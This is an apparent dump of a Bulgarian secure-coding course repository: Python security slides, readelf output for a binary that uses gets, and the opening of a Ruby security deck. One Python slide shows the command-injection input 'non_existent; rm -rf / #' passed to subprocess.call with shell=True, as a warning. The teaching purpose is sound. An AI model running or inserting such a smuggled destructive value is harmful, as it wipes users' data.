 94 |     Когато не сте сигурни, просто пробвайте.
 95 |   </p>
 96 |   
 97 | 
 98 |   
 99 |   <div class="code"><pre>$ python
100 | &gt;&gt;&gt; 5 + 10
101 | 15
102 | &gt;&gt;&gt; a = 5
103 | &gt;&gt;&gt; b = a + 10
104 | &gt;&gt;&gt; print(b)
105 | 15
106 | &gt;&gt;&gt; a * 2
107 | 10
108 | &gt;&gt;&gt; a ** 2
109 | 25
110 | &gt;&gt;&gt; "hello" + ', ' + "world"
111 | "hello, world"</pre></div>
112 |   
113 | 
114 |       
115 |       </article>
116 |   
117 |   
118 |   
119 |       <article>
120 |       
121 |         <h3>Един ред код</h3>
122 |         
123 |   
124 |   <div class="code"><pre>my_var = 'spam'.upper()
125 | print(my_var) # SPAM</pre></div>
126 |   
127 | 
128 |   <ul>
129 |   
130 |     <li>Съдържа един израз, никога не завършва с ;</li>
131 |   
132 |     <li>Всичко след # е коментар</li>
133 |   
134 |   </ul>
135 | 
136 |       
137 |       </article>
138 |   
139 |   
140 |   
141 |       <article>
142 |       
143 |         <h3>Имена</h3>
144 |         
145 |   
146 |   <p>
147 |     Можем да дадем име на стойност и получаваме променлива:
148 |   </p>
149 |   
150 | 
151 |   
152 |   <div class="code"><pre>velocity = distance / 60</pre></div>
153 |   
154 | 
155 |   
156 |   <p>
157 |     Динамичен език - стойностите имат тип, но имената - не.
158 |   </p>
159 |   
160 | 
161 |   
162 |   <div class="code"><pre>а = 5
163 | type(a) # &lt;class 'int'&gt;
164 | a = 'test'
165 | type(a) # &lt;class 'str'&gt;</pre></div>
166 |   
167 | 
168 |       
169 |       </article>
170 |   
171 |   
172 |   
173 |       <article>
174 |       
175 |         <h3>Имена</h3>
176 |         
177 | <div class="image">
178 |   <img src="Python_files/name_assignment_1.png">
179 | </div>
180 | 
181 | <div class="image">
182 |   <img src="Python_files/name_assignment_2.png">
183 | </div>
184 | 
185 | <div class="image">
186 |   <img src="Python_files/name_assignment_3.png">
187 | </div>
188 | 
189 |       
190 |       </article>
191 |   
192 |   
193 |   
194 |       <article>
195 |       
196 |         <h3>Duck-typing</h3>
197 |         <figcaption>When I see a bird that walks like a duck and swims like a duck and quacks like a duck, I call that bird a duck</figcaption>
198 |   
199 |   <div class="code"><pre>class Duck:
200 |     def quack(self):
201 |         print("Quack, quack!")
202 | 
203 |     def fly(self):
204 |         print("Flap, Flap!")
205 | 
206 | class Person:
207 |     def quack(self):
208 |         print("I'm Quackin'!")
209 | 
210 |     def fly(self):
211 |         print("I'm Flyin'!")
212 | 
213 | def in_the_forest(mallard):
214 |     mallard.quack()
215 |     mallard.fly()
216 | 
217 | in_the_forest(Duck())
218 | in_the_forest(Person())</pre></div>
219 |   
220 | 
221 |       
222 |       </article>
223 |   
224 |   
225 |   
226 |       <article>
227 |       
228 |         <h3>Всичко е обект</h3>
229 |         
230 |   
231 |   <p>
232 |     Буквално
233 |   </p>
234 |   
235 | 
236 |   
237 |   <div class="code"><pre>&gt;&gt;&gt; type(42)
238 | &lt;class 'int'&gt;
239 | &gt;&gt;&gt; type([])
240 | &lt;class 'list'&gt;
241 | &gt;&gt;&gt; type([]) is list
242 | True
243 | &gt;&gt;&gt; type(list)
244 | &lt;class 'type'&gt;
245 | &gt;&gt;&gt; type(list) is type
246 | True
247 | &gt;&gt;&gt; type(type(type(list)))
248 | &lt;class 'type'&gt;</pre></div>
249 |   
250 | 
251 |       
252 |       </article>
253 |   
254 |   
255 |   
256 |       <article>
257 |       
258 |         <h3>Класове</h3>
259 |         
260 |   
261 |   <div class="code"><pre>class Vector:
262 |     def __init__(self, x, y):
263 |         self.x = x
264 |         self.y = y
265 | 
266 | v = Vector(1.0, 1.0)</pre></div>
267 |   
268 | 
269 |   <ul>
270 |   
271 |     <li>Атрибутите не се нуждаят от декларации</li>
272 |   
273 |     <li>Винаги са достъпни</li>
274 |   
275 |     <li>Могат да се променят</li>
276 |   
277 |   </ul>
278 | 
279 |       
280 |       </article>
281 |   
282 |   
283 |   
284 |       <article>
285 |       
286 |         <h3>private/protected</h3>
287 |         
288 |   <ul>
289 |   
290 |     <li>private и protected концепциите не са това, за което сте свикнали да мислите в езици като C++/Java/C#</li>
291 |   
292 |     <li>Ограниченията за използване на защитени и частни методи в класовете в python е отговорност на програмиста</li>
293 |   
294 |     <li>Атрибути започващи с _ са защитени, т.е. би следвало да се ползват само от методи на класа и наследяващи го класове</li>
295 |   
296 |     <li>Атрибути започващи с <i></i> са частни, т.е. би следвало да се ползват само от методи на класа</li>
297 |   
298 |   </ul>
299 | 
300 |       
301 |       </article>
302 |   
303 |   
304 |   
305 |       <article>
306 |       
307 |         <h3>"би следвало"</h3>
308 |         
309 |   
310 |   <p>
311 |     Нищо не ви пречи да ги достъпвате
312 |   </p>
313 |   
314 | 
315 |       
316 |       </article>
317 |   
318 |   
319 |   
320 |       <article>
321 |       
322 |         <h3>Константи</h3>
323 |         
324 |   <ul>
325 |   
326 |     <li>Имената им са в <code>SCREAMING_SNAKE_CASE</code></li>
327 |   
328 |     <li>Също чисто конвенционални</li>
329 |   
330 |     <li>Можете да ги промените и нищо няма да ви спре</li>
331 |   
332 |   </ul>
333 | 
334 |       
335 |       </article>
336 |   
337 |   
338 |   
339 |       <article>
340 |       
341 |         <h3>Методи</h3>
342 |         
343 |   
344 |   <p>
345 |     Те са си атрибути като всички други
346 |   </p>
347 |   
348 | 
349 |   <ul>
350 |   
351 |     <li>Могат да се достъпват</li>
352 |   
353 |     <li>Могат да се променят</li>
354 |   
355 |     <li>Могат и да се добавят нови, по време на изпълнение</li>
356 |   
357 |   </ul>
358 | 
359 |   
360 |   <div class="code"><pre>v = Vector(1.0, 1.0)
361 | Vector.inject = lambda _: print("EVIL!!!!")
362 | v.inject()</pre></div>
363 |   
364 | 
365 |       
366 |       </article>
367 |   
368 |   
369 |   
370 |       <article>
371 |       
372 |         <h3>Достъп до всичко</h3>
373 |         
374 |   <ul>
375 |   
376 |     <li>Всеки обект си има <code>__dict__</code> със всички атрибути</li>
377 |   
378 |   </ul>
379 | 
380 |       
381 |       </article>
382 |   
383 |   
384 |   
385 |       <article>
386 |       
387 |         <h3>Можем да се предпазим от това</h3>
388 |         
389 |   
390 |   <p>
391 |     <code>__slots__</code>
392 |   </p>
393 |   
394 | 
395 |   
396 |   <div class="code"><pre>class Vector:
397 |     __slots__ = 'x', 'y'
398 | 
399 | v = Vector()
400 | v.x = 1
401 | v.y = 2
402 | v.z = 3
403 | ---------------------------------------------------------------------------
404 | AttributeError                            Traceback (most recent call last)
405 | &lt;ipython-input-20-8460e7b49cf0&gt; in &lt;module&gt;()
406 | ----&gt; 1 v.z = 3
407 | 
408 | AttributeError: 'Vector' object has no attribute 'z'</pre></div>
409 |   
410 | 
411 |   <ul>
412 |   
413 |     <li>По-компактни обекти</li>
414 |   
415 |     <li>Контрол над атрибутите</li>
416 |   
417 |     <li>Идеални, ако правите <b>много</b> от тях</li>
418 |   
419 |   </ul>
420 | 
421 |       
422 |       </article>
423 |   
424 |   
425 |   
426 |       <article>
427 |       
428 |         <h3>Достъпване от потребителски вход</h3>
429 |         
430 |   
431 |   <p>
432 |     Можем и да правим и така:
433 |   </p>
434 |   
435 | 
436 |   
437 |   <div class="code"><pre>getattr(v, some_str_from_the_stdin)</pre></div>
438 |   
439 | 
440 |   
441 |   <p>
442 |     Внимавайте с това
443 |   </p>
444 |   
445 | 
446 |       
447 |       </article>
448 |   
449 |   
450 |   
451 |       <article>
452 |       
453 |         <h3>Магически методи</h3>
454 |         
455 |   <ul>
456 |   
457 |     <li> __add__(self, other) за self + other</li>
458 |   
459 |     <li> __sub__(self, other) за self - other</li>
460 |   
461 |     <li> __mul__(self, other) за self * other</li>
462 |   
463 |     <li> __truediv__(self, other) за self / other</li>
464 |   
465 |     <li> __floordiv__(self, other) за self // other</li>
466 |   
467 |     <li> __mod__(self, other) за self % other</li>
468 |   
469 |     <li> __lshift__(self, other) за self &lt;&lt; other</li>
470 |   
471 |     <li> __rshift__(self, other) за self &gt;&gt; other</li>
472 |   
473 |     <li> __and__(self, other) за self &amp; other</li>
474 |   
475 |     <li> __xor__(self, other) за self ^ other</li>
476 |   
477 |     <li> __or__(self, other) за self | other</li>
478 |   
479 |   </ul>
480 | 
481 |       
482 |       </article>
483 |   
484 |   
485 |   
486 |       <article class="far-past">
487 |       
488 |         <h3>GC</h3>
489 |         
490 |   <ul>
491 |   
492 |     <li>reference counting</li>
493 |   
494 |     <li>Може да се справя с циклите... почти винаги</li>
495 |   
496 |     <li>Можете да дефинирате _finalizer_-и на вашите обекти с <code>__del__</code></li>
497 |   
498 |     <li>Ако обекти с дефинирани _finalizer_-и зациклят, интерпретаторът вдига ръце</li>
499 |   
500 |     <li>Можете да си ги чистите сами... ако се сетите</li>
501 |   
502 |     <li>Което едва ли ще стане, преди това да е проблем</li>
503 |   
504 |   </ul>
505 | 
506 |       
507 |       </article>
508 |   
509 |   
510 |   
511 |       <article class="past">
512 |       
513 |         <h3>Concurrency</h3>
514 |         
515 |   
516 |   <p>
517 |     И в Python има GIL
518 |   </p>
519 |   
520 | 
521 |   <ul>
522 |   
523 |     <li>Подходящ за I/O bound проблеми</li>
524 |   
525 |     <li>Крайно неподходящ за CPU bound такива</li>
526 |   
527 |   </ul>
528 | 
529 |       
530 |       </article>
531 |   
532 |   
533 |   
534 |       <article class="current">
535 |       
536 |         <h3>Parallelism</h3>
537 |         
538 |   
539 |   <p>
540 |     Само с нови процеси
541 |   </p>
542 |   
543 | 
544 |   <ul>
545 |   
546 |     <li>multiprocessing</li>
547 |   
548 |     <li>subproccess</li>
549 |   
550 |   </ul>
551 | 
552 |       
553 |       </article>
554 |   
555 |   
556 |   
557 |       <article class="next">
558 |       
559 |         <h3>subproccess.call</h3>
560 |         
561 |   
562 |   <p>
563 |     В никакъв случай не му подавайте <code>shell=True</code>, ако има потребителски вход
564 |   </p>
565 |   
566 | 
567 |   
568 |   <div class="code"><pre>&gt;&gt;&gt; from subprocess import call
569 | &gt;&gt;&gt; filename = input("What file would you like to display?\n")
570 | What file would you like to display?
571 | non_existent; rm -rf / #
572 | &gt;&gt;&gt; call("cat " + filename, shell=True) # Uh-oh. This will end badly...</pre></div>
573 |   
574 | 
575 |       
576 |       </article>
577 |   
578 |   
579 | 
580 |       <article class="far-next">
581 |         <h3>Thank you</h3>
582 |         
583 |           <div class="presenter">
584 |             
585 |   
586 |   <p>
587 |     Кирил Владимиров
588 |   </p>
589 |   
590 | 
591 |           </div>
592 |         
593 |           <div class="presenter">
594 |             <p class="link"><a href="mailto:kiril@vladimiroff.org" target="_blank">kiril@vladimiroff.org</a></p><p class="link"><a href="http://twitter.com/K_Vladimiroff" target="_blank">@K_Vladimiroff</a></p>
595 |   
596 |   <p>
597 |     github.com/Vladimiroff
598 |   </p>
599 |   
600 | 
601 |           </div>
602 |         
603 |           <div class="presenter">
604 |             
605 |   
606 |   <p>
607 |     
608 |   </p>
609 |   
610 | 
611 |           </div>
612 |         
613 |       </article>
614 | 
615 |     <div id="prev-slide-area" class="slide-area"></div><div id="next-slide-area" class="slide-area"></div></section>
616 | 
617 |     <div style="display: none;" id="help">
618 |       Use the left and right arrow keys or click the left and right
619 |       edges of the page to navigate between slides.<br>
620 |       (Press 'H' or navigate to hide this message.)
621 |     </div>
622 | 
623 |   
624 |   
625 |   <script src="Python_files/play.js"></script>
626 |   
627 | 
628 | <link href="Python_files/css.css" type="text/css" rel="stylesheet"><link href="Python_files/styles.css" type="text/css" rel="stylesheet"></body></html>


--------------------------------------------------------------------------------
/code/C/elf-normal:
--------------------------------------------------------------------------------
  1 | ELF Header:
  2 |   Magic:   7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 
  3 |   Class:                             ELF32
  4 |   Data:                              2's complement, little endian
  5 |   Version:                           1 (current)
  6 |   OS/ABI:                            UNIX - System V
  7 |   ABI Version:                       0
  8 |   Type:                              EXEC (Executable file)
  9 |   Machine:                           Intel 80386
 10 |   Version:                           0x1
 11 |   Entry point address:               0x80482f0
 12 |   Start of program headers:          52 (bytes into file)
 13 |   Start of section headers:          3660 (bytes into file)
 14 |   Flags:                             0x0
 15 |   Size of this header:               52 (bytes)
 16 |   Size of program headers:           32 (bytes)
 17 |   Number of program headers:         8
 18 |   Size of section headers:           40 (bytes)
 19 |   Number of section headers:         35
 20 |   Section header string table index: 32
 21 | 
 22 | Section Headers:
 23 |   [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
 24 |   [ 0]                   NULL            00000000 000000 000000 00      0   0  0
 25 |   [ 1] .interp           PROGBITS        08048134 000134 000013 00   A  0   0  1
 26 |   [ 2] .note.ABI-tag     NOTE            08048148 000148 000020 00   A  0   0  4
 27 |   [ 3] .hash             HASH            08048168 000168 000028 04   A  4   0  4
 28 |   [ 4] .dynsym           DYNSYM          08048190 000190 000050 10   A  5   1  4
 29 |   [ 5] .dynstr           STRTAB          080481e0 0001e0 00004a 00   A  0   0  1
 30 |   [ 6] .gnu.version      VERSYM          0804822a 00022a 00000a 02   A  4   0  2
 31 |   [ 7] .gnu.version_r    VERNEED         08048234 000234 000020 00   A  5   1  4
 32 |   [ 8] .rel.dyn          REL             08048254 000254 000008 08   A  4   0  4
 33 |   [ 9] .rel.plt          REL             0804825c 00025c 000018 08   A  4  11  4
 34 |   [10] .init             PROGBITS        08048274 000274 00002d 00  AX  0   0  4
 35 |   [11] .plt              PROGBITS        080482b0 0002b0 000040 04  AX  0   0 16
 36 |   [12] .text             PROGBITS        080482f0 0002f0 00020a 00  AX  0   0 16
 37 |   [13] .fini             PROGBITS        080484fc 0004fc 000019 00  AX  0   0  4
 38 |   [14] .rodata           PROGBITS        08048518 000518 000008 00   A  0   0  4
 39 |   [15] .eh_frame_hdr     PROGBITS        08048520 000520 000034 00   A  0   0  4
 40 |   [16] .eh_frame         PROGBITS        08048554 000554 0000d0 00   A  0   0  4
 41 |   [17] .ctors            PROGBITS        08049624 000624 000008 00  WA  0   0  4
 42 |   [18] .dtors            PROGBITS        0804962c 00062c 000008 00  WA  0   0  4
 43 |   [19] .jcr              PROGBITS        08049634 000634 000004 00  WA  0   0  4
 44 |   [20] .dynamic          DYNAMIC         08049638 000638 0000c8 08  WA  5   0  4
 45 |   [21] .got              PROGBITS        08049700 000700 000004 04  WA  0   0  4
 46 |   [22] .got.plt          PROGBITS        08049704 000704 000018 04  WA  0   0  4
 47 |   [23] .data             PROGBITS        0804971c 00071c 000008 00  WA  0   0  4
 48 |   [24] .bss              NOBITS          08049724 000724 000008 00  WA  0   0  4
 49 |   [25] .comment          PROGBITS        00000000 000724 000022 01  MS  0   0  1
 50 |   [26] .debug_aranges    PROGBITS        00000000 000748 000090 00      0   0  8
 51 |   [27] .debug_info       PROGBITS        00000000 0007d8 0001fe 00      0   0  1
 52 |   [28] .debug_abbrev     PROGBITS        00000000 0009d6 000076 00      0   0  1
 53 |   [29] .debug_line       PROGBITS        00000000 000a4c 000143 00      0   0  1
 54 |   [30] .debug_str        PROGBITS        00000000 000b8f 000141 01  MS  0   0  1
 55 |   [31] .debug_ranges     PROGBITS        00000000 000cd0 000048 00      0   0  8
 56 |   [32] .shstrtab         STRTAB          00000000 000d18 000133 00      0   0  1
 57 |   [33] .symtab           SYMTAB          00000000 0013c4 0004e0 10     34  54  4
 58 |   [34] .strtab           STRTAB          00000000 0018a4 000280 00      0   0  1
 59 | Key to Flags:
 60 |   W (write), A (alloc), X (execute), M (merge), S (strings)
 61 |   I (info), L (link order), G (group), T (TLS), E (exclude), x (unknown)
 62 |   O (extra OS processing required) o (OS specific), p (processor specific)
 63 | 
 64 | There are no section groups in this file.
 65 | 
 66 | Program Headers:
 67 |   Type           Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align
 68 |   PHDR           0x000034 0x08048034 0x08048034 0x00100 0x00100 R E 0x4
 69 |   INTERP         0x000134 0x08048134 0x08048134 0x00013 0x00013 R   0x1
 70 |       [Requesting program interpreter: /lib/ld-linux.so.2]
 71 |   LOAD           0x000000 0x08048000 0x08048000 0x00624 0x00624 R E 0x1000
 72 |   LOAD           0x000624 0x08049624 0x08049624 0x00100 0x00108 RW  0x1000
 73 |   DYNAMIC        0x000638 0x08049638 0x08049638 0x000c8 0x000c8 RW  0x4
 74 |   NOTE           0x000148 0x08048148 0x08048148 0x00020 0x00020 R   0x4
 75 |   GNU_EH_FRAME   0x000520 0x08048520 0x08048520 0x00034 0x00034 R   0x4
 76 |   GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RW  0x10
 77 | 
 78 |  Section to Segment mapping:
 79 |   Segment Sections...
 80 |    00     
 81 |    01     .interp 
 82 |    02     .interp .note.ABI-tag .hash .dynsym .dynstr .gnu.version .gnu.version_r .rel.dyn .rel.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame 
 83 |    03     .ctors .dtors .jcr .dynamic .got .got.plt .data .bss 
 84 |    04     .dynamic 
 85 |    05     .note.ABI-tag 
 86 |    06     .eh_frame_hdr 
 87 |    07     
 88 | 
 89 | Dynamic section at offset 0x638 contains 20 entries:
 90 |   Tag        Type                         Name/Value
 91 |  0x00000001 (NEEDED)                     Shared library: [libc.so.6]
 92 |  0x0000000c (INIT)                       0x8048274
 93 |  0x0000000d (FINI)                       0x80484fc
 94 |  0x00000004 (HASH)                       0x8048168
 95 |  0x00000005 (STRTAB)                     0x80481e0
 96 |  0x00000006 (SYMTAB)                     0x8048190
 97 |  0x0000000a (STRSZ)                      74 (bytes)
 98 |  0x0000000b (SYMENT)                     16 (bytes)
 99 |  0x00000015 (DEBUG)                      0x0
100 |  0x00000003 (PLTGOT)                     0x8049704
101 |  0x00000002 (PLTRELSZ)                   24 (bytes)
102 |  0x00000014 (PLTREL)                     REL
103 |  0x00000017 (JMPREL)                     0x804825c
104 |  0x00000011 (REL)                        0x8048254
105 |  0x00000012 (RELSZ)                      8 (bytes)
106 |  0x00000013 (RELENT)                     8 (bytes)
107 |  0x6ffffffe (VERNEED)                    0x8048234
108 |  0x6fffffff (VERNEEDNUM)                 1
109 |  0x6ffffff0 (VERSYM)                     0x804822a
110 |  0x00000000 (NULL)                       0x0
111 | 
112 | Relocation section '.rel.dyn' at offset 0x254 contains 1 entries:
113 |  Offset     Info    Type            Sym.Value  Sym. Name
114 | 08049700  00000206 R_386_GLOB_DAT    00000000   __gmon_start__
115 | 
116 | Relocation section '.rel.plt' at offset 0x25c contains 3 entries:
117 |  Offset     Info    Type            Sym.Value  Sym. Name
118 | 08049710  00000107 R_386_JUMP_SLOT   00000000   gets
119 | 08049714  00000207 R_386_JUMP_SLOT   00000000   __gmon_start__
120 | 08049718  00000407 R_386_JUMP_SLOT   00000000   __libc_start_main
121 | 
122 | The decoding of unwind sections for machine type Intel 80386 is not currently supported.
123 | 
124 | Symbol table '.dynsym' contains 5 entries:
125 |    Num:    Value  Size Type    Bind   Vis      Ndx Name
126 |      0: 00000000     0 NOTYPE  LOCAL  DEFAULT  UND 
127 |      1: 00000000     0 FUNC    GLOBAL DEFAULT  UND gets@GLIBC_2.0 (2)
128 |      2: 00000000     0 NOTYPE  WEAK   DEFAULT  UND __gmon_start__
129 |      3: 0804851c     4 OBJECT  GLOBAL DEFAULT   14 _IO_stdin_used
130 |      4: 00000000     0 FUNC    GLOBAL DEFAULT  UND __libc_start_main@GLIBC_2.0 (2)
131 | 
132 | Symbol table '.symtab' contains 78 entries:
133 |    Num:    Value  Size Type    Bind   Vis      Ndx Name
134 |      0: 00000000     0 NOTYPE  LOCAL  DEFAULT  UND 
135 |      1: 08048134     0 SECTION LOCAL  DEFAULT    1 
136 |      2: 08048148     0 SECTION LOCAL  DEFAULT    2 
137 |      3: 08048168     0 SECTION LOCAL  DEFAULT    3 
138 |      4: 08048190     0 SECTION LOCAL  DEFAULT    4 
139 |      5: 080481e0     0 SECTION LOCAL  DEFAULT    5 
140 |      6: 0804822a     0 SECTION LOCAL  DEFAULT    6 
141 |      7: 08048234     0 SECTION LOCAL  DEFAULT    7 
142 |      8: 08048254     0 SECTION LOCAL  DEFAULT    8 
143 |      9: 0804825c     0 SECTION LOCAL  DEFAULT    9 
144 |     10: 08048274     0 SECTION LOCAL  DEFAULT   10 
145 |     11: 080482b0     0 SECTION LOCAL  DEFAULT   11 
146 |     12: 080482f0     0 SECTION LOCAL  DEFAULT   12 
147 |     13: 080484fc     0 SECTION LOCAL  DEFAULT   13 
148 |     14: 08048518     0 SECTION LOCAL  DEFAULT   14 
149 |     15: 08048520     0 SECTION LOCAL  DEFAULT   15 
150 |     16: 08048554     0 SECTION LOCAL  DEFAULT   16 
151 |     17: 08049624     0 SECTION LOCAL  DEFAULT   17 
152 |     18: 0804962c     0 SECTION LOCAL  DEFAULT   18 
153 |     19: 08049634     0 SECTION LOCAL  DEFAULT   19 
154 |     20: 08049638     0 SECTION LOCAL  DEFAULT   20 
155 |     21: 08049700     0 SECTION LOCAL  DEFAULT   21 
156 |     22: 08049704     0 SECTION LOCAL  DEFAULT   22 
157 |     23: 0804971c     0 SECTION LOCAL  DEFAULT   23 
158 |     24: 08049724     0 SECTION LOCAL  DEFAULT   24 
159 |     25: 00000000     0 SECTION LOCAL  DEFAULT   25 
160 |     26: 00000000     0 SECTION LOCAL  DEFAULT   26 
161 |     27: 00000000     0 SECTION LOCAL  DEFAULT   27 
162 |     28: 00000000     0 SECTION LOCAL  DEFAULT   28 
163 |     29: 00000000     0 SECTION LOCAL  DEFAULT   29 
164 |     30: 00000000     0 SECTION LOCAL  DEFAULT   30 
165 |     31: 00000000     0 SECTION LOCAL  DEFAULT   31 
166 |     32: 00000000     0 FILE    LOCAL  DEFAULT  ABS init.c
167 |     33: 00000000     0 FILE    LOCAL  DEFAULT  ABS crtstuff.c
168 |     34: 08049624     0 OBJECT  LOCAL  DEFAULT   17 __CTOR_LIST__
169 |     35: 0804962c     0 OBJECT  LOCAL  DEFAULT   18 __DTOR_LIST__
170 |     36: 08049634     0 OBJECT  LOCAL  DEFAULT   19 __JCR_LIST__
171 |     37: 08048330     0 FUNC    LOCAL  DEFAULT   12 deregister_tm_clones
172 |     38: 08048360     0 FUNC    LOCAL  DEFAULT   12 register_tm_clones
173 |     39: 080483a0     0 FUNC    LOCAL  DEFAULT   12 __do_global_dtors_aux
174 |     40: 08049724     1 OBJECT  LOCAL  DEFAULT   24 completed.5978
175 |     41: 08049728     4 OBJECT  LOCAL  DEFAULT   24 dtor_idx.5980
176 |     42: 08048400     0 FUNC    LOCAL  DEFAULT   12 frame_dummy
177 |     43: 00000000     0 FILE    LOCAL  DEFAULT  ABS crtstuff.c
178 |     44: 08049628     0 OBJECT  LOCAL  DEFAULT   17 __CTOR_END__
179 |     45: 08048620     0 OBJECT  LOCAL  DEFAULT   16 __FRAME_END__
180 |     46: 08049634     0 OBJECT  LOCAL  DEFAULT   19 __JCR_END__
181 |     47: 080484d0     0 FUNC    LOCAL  DEFAULT   12 __do_global_ctors_aux
182 |     48: 00000000     0 FILE    LOCAL  DEFAULT  ABS stack-protection.c
183 |     49: 00000000     0 FILE    LOCAL  DEFAULT  ABS 
184 |     50: 08049624     0 NOTYPE  LOCAL  DEFAULT   17 __init_array_end
185 |     51: 08049638     0 OBJECT  LOCAL  DEFAULT   20 _DYNAMIC
186 |     52: 08049624     0 NOTYPE  LOCAL  DEFAULT   17 __init_array_start
187 |     53: 08049704     0 OBJECT  LOCAL  DEFAULT   22 _GLOBAL_OFFSET_TABLE_
188 |     54: 080484c0     2 FUNC    GLOBAL DEFAULT   12 __libc_csu_fini
189 |     55: 00000000     0 NOTYPE  WEAK   DEFAULT  UND _ITM_deregisterTMCloneTab
190 |     56: 08048320     4 FUNC    GLOBAL HIDDEN    12 __x86.get_pc_thunk.bx
191 |     57: 0804971c     0 NOTYPE  WEAK   DEFAULT   23 data_start
192 |     58: 00000000     0 FUNC    GLOBAL DEFAULT  UND gets@@GLIBC_2.0
193 |     59: 08049724     0 NOTYPE  GLOBAL DEFAULT   23 _edata
194 |     60: 080484fc     0 FUNC    GLOBAL DEFAULT   13 _fini
195 |     61: 08049630     0 OBJECT  GLOBAL HIDDEN    18 __DTOR_END__
196 |     62: 0804971c     0 NOTYPE  GLOBAL DEFAULT   23 __data_start
197 |     63: 00000000     0 NOTYPE  WEAK   DEFAULT  UND __gmon_start__
198 |     64: 08049720     0 OBJECT  GLOBAL HIDDEN    23 __dso_handle
199 |     65: 0804851c     4 OBJECT  GLOBAL DEFAULT   14 _IO_stdin_used
200 |     66: 00000000     0 FUNC    GLOBAL DEFAULT  UND __libc_start_main@@GLIBC_
201 |     67: 08048450    97 FUNC    GLOBAL DEFAULT   12 __libc_csu_init
202 |     68: 0804972c     0 NOTYPE  GLOBAL DEFAULT   24 _end
203 |     69: 080482f0     0 FUNC    GLOBAL DEFAULT   12 _start
204 |     70: 08048518     4 OBJECT  GLOBAL DEFAULT   14 _fp_hw
205 |     71: 08049724     0 NOTYPE  GLOBAL DEFAULT   24 __bss_start
206 |     72: 08048443    13 FUNC    GLOBAL DEFAULT   12 main
207 |     73: 00000000     0 NOTYPE  WEAK   DEFAULT  UND _Jv_RegisterClasses
208 |     74: 08049724     0 OBJECT  GLOBAL HIDDEN    23 __TMC_END__
209 |     75: 00000000     0 NOTYPE  WEAK   DEFAULT  UND _ITM_registerTMCloneTable
210 |     76: 08048430    19 FUNC    GLOBAL DEFAULT   12 user_read
211 |     77: 08048274     0 FUNC    GLOBAL DEFAULT   10 _init
212 | 
213 | Histogram for bucket list length (total of 3 buckets):
214 |  Length  Number     % of total  Coverage
215 |       0  0          (  0.0%)
216 |       1  2          ( 66.7%)     50.0%
217 |       2  1          ( 33.3%)    100.0%
218 | 
219 | Version symbols section '.gnu.version' contains 5 entries:
220 |  Addr: 000000000804822a  Offset: 0x00022a  Link: 4 (.dynsym)
221 |   000:   0 (*local*)       2 (GLIBC_2.0)     0 (*local*)       1 (*global*)   
222 |   004:   2 (GLIBC_2.0)  
223 | 
224 | Version needs section '.gnu.version_r' contains 1 entries:
225 |  Addr: 0x0000000008048234  Offset: 0x000234  Link: 5 (.dynstr)
226 |   000000: Version: 1  File: libc.so.6  Cnt: 1
227 |   0x0010:   Name: GLIBC_2.0  Flags: none  Version: 2
228 | 
229 | Notes at offset 0x00000148 with length 0x00000020:
230 |   Owner                 Data size	Description
231 |   GNU                  0x00000010	NT_GNU_ABI_TAG (ABI version tag)
232 |     OS: Linux, ABI: 2.6.32
233 | 


--------------------------------------------------------------------------------
/presentations/ruby/index.html:
--------------------------------------------------------------------------------
  1 | <!doctype html>
  2 | <html lang="bg">
  3 | 
  4 |   <head>
  5 |     <meta charset="utf-8">
  6 | 
  7 |     <title>Ruby – особености от гледна точка на сигурността</title>
  8 | 
  9 |     <meta name="apple-mobile-web-app-capable" content="yes" />
 10 |     <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent" />
 11 | 
 12 |     <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, minimal-ui">
 13 | 
 14 |     <link rel="stylesheet" href="css/reveal.css">
 15 |     <link rel="stylesheet" href="css/theme/white.css" id="theme">
 16 | 
 17 |     <!-- Code syntax highlighting -->
 18 |     <link rel="stylesheet" href="lib/css/tomorrow.css">
 19 | 
 20 |     <!-- Printing and PDF exports -->
 21 |     <script>
 22 |      var link = document.createElement( 'link' );
 23 |      link.rel = 'stylesheet';
 24 |      link.type = 'text/css';
 25 |      link.href = window.location.search.match( /print-pdf/gi ) ? 'css/print/pdf.css' : 'css/print/paper.css';
 26 |      document.getElementsByTagName( 'head' )[0].appendChild( link );
 27 |     </script>
 28 | 
 29 |     <!--[if lt IE 9]>
 30 |     <script src="lib/js/html5shiv.js"></script>
 31 |     <![endif]-->
 32 |   </head>
 33 | 
 34 |   <body>
 35 | 
 36 |     <div class="reveal">
 37 | 
 38 |       <!-- Any section element inside of this container is displayed as a slide -->
 39 |       <div class="slides">
 40 | 	<section>
 41 | 	  <h1>Ruby</h1>
 42 | 	  <h3>Особености от гледна точка на сигурността</h3>
 43 | 	</section>
 44 | 
 45 | 	<section>
 46 | 	  <h2>Набързо за Ruby</h2>
 47 |           <p>
 48 | 	    <span class="fragment">Динамичен</span><span class="fragment">, oбектно-ориентиран</span><span class="fragment">, general-purpose</span><span class="fragment">, но предимно използван за Web, език за програмиране</span>
 49 | 	  </p>
 50 | 	</section>
 51 | 
 52 |         <section>
 53 |           <h2>Всичко е обект</h2>
 54 |           <pre class="fragment"><code class="language-ruby">
 55 | 123.class
 56 | #=> Fixnum
 57 |           </code></pre>
 58 |           <pre class="fragment"><code class="language-ruby">
 59 | "Ruby".class
 60 | #=> String
 61 |           </code></pre>
 62 |           <pre class="fragment"><code class="language-ruby">
 63 | nil.class
 64 | #=> NilClass
 65 |           </code></pre>
 66 |           <pre class="fragment"><code class="language-ruby">
 67 | true.class
 68 | #=> TrueClass
 69 |           </code></pre>
 70 |         </section>
 71 | 
 72 |         <section>
 73 |           <section>
 74 |             <h2>Променливи</h2>
 75 |             <ul>
 76 |               <li class="fragment">глобални: <pre><code class="language-ruby">$FOO = "bar"</code></pre></li>
 77 |               <li class="fragment">на инстанцията: <pre><code class="language-ruby">@foo = "bar"</code></pre></li>
 78 |               <li class="fragment">на класа: <pre><code class="language-ruby">@@foo = "bar"</code></pre></li>
 79 |               <li class="fragment">локални: <pre><code class="language-ruby">foo = "bar"</code></pre></li>
 80 |             </ul>
 81 |           </section>
 82 | 
 83 |           <section>
 84 |             <p>Когато решите да дефинирате глобална променлива в Ruby, станете от компютъра, изпийте една студена вода и се разходете.</p>
